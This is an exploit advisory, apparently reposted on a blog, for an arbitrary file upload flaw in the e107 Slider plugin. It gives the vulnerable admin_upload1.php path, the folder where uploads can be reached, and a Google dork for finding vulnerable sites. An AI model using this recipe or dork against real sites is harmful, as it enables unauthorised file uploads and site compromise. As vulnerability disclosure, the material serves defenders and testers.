e107 Plugin Slider Arbitrary File Upload Vulnerability


/-----------------------------------------------------------------------------------------------------
# Exploit Title : e107 Plugin Slider Arbitrary File Upload Vulnerability
# Author : Ryuzaki Lawlet / Fahmi Fisal
# Blog  : justryuz.blogspot.com /
# E-mail : ryuzaki_l@y7mail.com /
# Date: June 6/2013 (4.44 pm)
# Version : 1.0
# Vendor: www.e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=0&id=635 (Slider auto random v1.0 )
# Tested on : Ubuntu / Window XP
# Google Dork : inurl:/e107_plugins/slider
# CVE:
------------------------------------------------------------------------------------------------------/

/------------
Description:
-----------/

A arbitrary file upload vulnerability exists in the e107_plugins/slider/admin_upload1.php
function, in which an attacker can upload a malicious POST request that could be sent by as Administrator.
The severity of this vulnerability increases when the Administrator has the ability to post New Items.

/-----
Poc
-----/

Go to this above link ,
Example : http://victim/e107_plugins/slider/admin_upload1.php
Now you can upload files from right menu , and more option that you can see them above.


Uploaded file access : http://victim/e107_plugins/slider/images/large/

------------------------------------------------------------------------------------------
Thanks: to all my friend :)

Postingan terkait:

Belum ada tanggapan untuk "e107 Plugin Slider Arbitrary File Upload Vulnerability"

Post a Comment